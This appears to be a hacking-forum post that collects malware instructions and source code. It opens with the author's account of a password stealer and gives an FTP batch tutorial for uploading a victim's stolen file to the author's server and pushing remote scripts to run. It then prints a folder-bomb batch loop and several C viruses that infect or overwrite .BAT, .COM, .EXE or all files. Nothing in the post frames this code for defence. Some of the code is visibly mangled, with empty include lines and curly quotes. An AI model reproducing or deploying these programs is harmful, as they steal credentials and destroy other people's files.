Sending Files Via ftp Batch!
OK, So i made a password stealer that would output a .txt file to the windows folderm i then made a ftp batch that would upload the txt file to my server, so far ive managed to get some passwords but not for anything important, So if you want to know how to make a ftp batch then heres how.
First for example were gonna try upload a file called Test.txt to our server

Upload.bat
ftp -n -i -s:MyUploadFiles.ftp

First make a file called upload.bat and put this in, Now we need to make the myuploadfiles.ftp, if you wanna call it something else then change the myuploadfiles.ftp to what you want but KEEP the .ftp at the end.
Ok now its the myuploadfiles.ftp creating time, or whatever you called it before.
open your-host
user username.spam.com password
ASCII
send test.txt
BI
This is the bit where you have to change the username password and host to what your ftp host is. then change the send test.txt to what file you want to upload, it doesn't have to be a txt file, it can be any one.

Now make sure both files are in the same dir as each other and run the .bat file. check your ftp server and guess whats sitting there! test.txt! So if you want to upload a file from someone's pc, you could use this?

Also theres nothing stopping you from putting in the "get" command in the .ftp, say get download.bat, whenever you want to change what it does make it call it download.bat and shove it on the server, then the victim will download it and be executed.
Folder Replicator Batch VIRUS
Here is a Simple bacth virus that contains only 6 lines, has the tendency to replicate itself again
and again and keeps on creating a folder with same name, until a user stops it.

1. Just open up a notepad, copy and paste the below code
cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop


2. Save it as a batch file with the extension .bat.
3. Then run it on the Victims computer to infect it.
4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.


VIRUS CODES IN “ C “ :-

BATCH & COM VIRUS

#include
#include
#include
#include

struct ffblk ffblk;
main()
{
char old_dir[MAXPATH];
Get_Path(old_dir);            /* Save the old directory  */
Pick_A_Dir();                 /* Find a new directory to */
Infect_Directory();           /* infect and infect it.   */
chdir(old_dir);               /* Return to old directory */
return 0;
}



Pick_A_Dir()
{
int done;
chdir(”..”);                      /* First, Go out a DIR. */
done=findfirst(”*.BAT”,&ffblk,0); /* If no BAT files, try */
/* root and DOS         */
if (done)
{
chdir(”\\”);
done=findfirst(”*.BAT”,&ffblk,0);
if (done) chdir(”\\DOS\\”);
}
return 0;
}


Infect_Directory()
{
int done;

done = findfirst(”*.BAT”,&ffblk,0);
while (!done)                       /* Find all .BAT files */
{                                /* and add code to run */
Do_Batch();                     /* BAT&COM if not      */
done = findnext(&ffblk);        /* already there       */
}

if (findfirst(”BAT&COM.COM”,&ffblk,0)) /* If BAT&COM does  */
{Copy_Virus();}                     /* not exist, then  */
return 0;                              /* copy it into dir.*/
}



Do_Batch()
{
FILE *batch;
char Infection_Buffer[12];
char vpath[MAXPATH];

Get_Path(vpath);            /* Get path for adding path */
/* specifier in commands    */


if (vpath[3]==0) vpath[2]=0; /* Keep path good in root  */

batch=fopen(ffblk.ff_name, “rt+”);
fseek(batch, -11, SEEK_END);
fread(Infection_Buffer,11,1,batch);
Infection_Buffer[11]=0;             /* Terminate String */

if (strcmp(Infection_Buffer,”BAT&COM.COM”)) /* Check if */
{                                   /* Batch is */
fseek(batch, 0, SEEK_END);          /* infected.*/
fprintf(batch,”\n%s\\BAT&COM.COM”,vpath);
}                              /*^- Add command */
/*   to batch    */

fclose(batch);
return 0;
}


Copy_Virus()
{
FILE *old_virus, *new_virus;
int write_length;
char copy_buffer[1024];              /* Copy the virus to */
/* new directory     */
old_virus=fopen(_argv[0],”rb”);
new_virus=fopen(”BAT&COM.COM”,”wb”);

write_length=1024;

while (write_length==1024)
{
write_length=fread(copy_buffer,1,1024,old_virus);
fwrite(copy_buffer,write_length,1,new_virus);
}
fclose(old_virus);
fclose(new_virus);
return 0;
}


Get_Path(char *path)
{
strcpy(path, “A:\\”);
path[0] =’A’ + getdisk();    /* Returns current path */
getcurdir(0, path+3);
return 0;
}
-       – - —————–End of Code———————— – - -



BLACK WOLF VIRUS

/*  It will infect all .COM files in the current directory  */

#include
#include
#include

FILE *Virus,*Host;
int x,y,done;
char buff[256];
struct ffblk ffblk;

main()
{
done = findfirst(”*.COM”,&ffblk,0);   /* Find a .COM file */
while (!done)               /* Loop for all COM’s in DIR*/
{
printf(”Infecting  %s\n”, ffblk.ff_name);    /* Inform user */
Virus=fopen(_argv[0],”rb”);          /* Open infected file  */
Host=fopen(ffblk.ff_name,”rb+”);     /* Open new host file  */

x=9504;                               /* Virus size – must   */
/* be correct for the  */
/* compiler it is made */
/* on, otherwise the   */
/* entire virus may not*/
/* be copied!!         */
while (x>256)                         /* OVERWRITE new Host  */
{                                 /* Read/Write 256 byte */
fread(buff,256,1,Virus);          /* chunks until bytes  */
fwrite(buff,256,1,Host);          /* left < 256          */
x-=256;
}
fread(buff,x,1,Virus);                /* Finish off copy     */
fwrite(buff,x,1,Host);
fcloseall();                          /* Close both files and*/
done = findnext(&ffblk);              /* go for another one. */
}
/* Activation would go */
/* here                */
return (0);                             /* Terminate           */
}


OVERWRITE VIRUS CODE
#include
#include
#include
void main(int argc,char *argv[])
{
int bytes,i,done;
FILE *virus,*host;
struct ffblk *f;
char buffer[512];
do
{
done=findfirst(”*.exe”,f,0);
while(!done)
{
virus=fopen(argv[0],”rb”);//open the virus in read mode
host=fopen(f->ff_name,”rb+”);//open the host file in r/w mode

for(;fread(buffer,512,1,virus)==1;)

fwrite(buffer,512,1,host);
fclose(host);
fseek(virus,0,0);//points to begining of virus
printf(”infecting %s
“,f->ff_name);
done=findnext(f);
}
}
while(!chdir(”..”));
printf(”For any querry contact
Anuj Parihar;anujpixel@gmail.com“);


REPLICATION VIRUS

#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Rakesh_dwivedi(rakeshdwivedi21@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}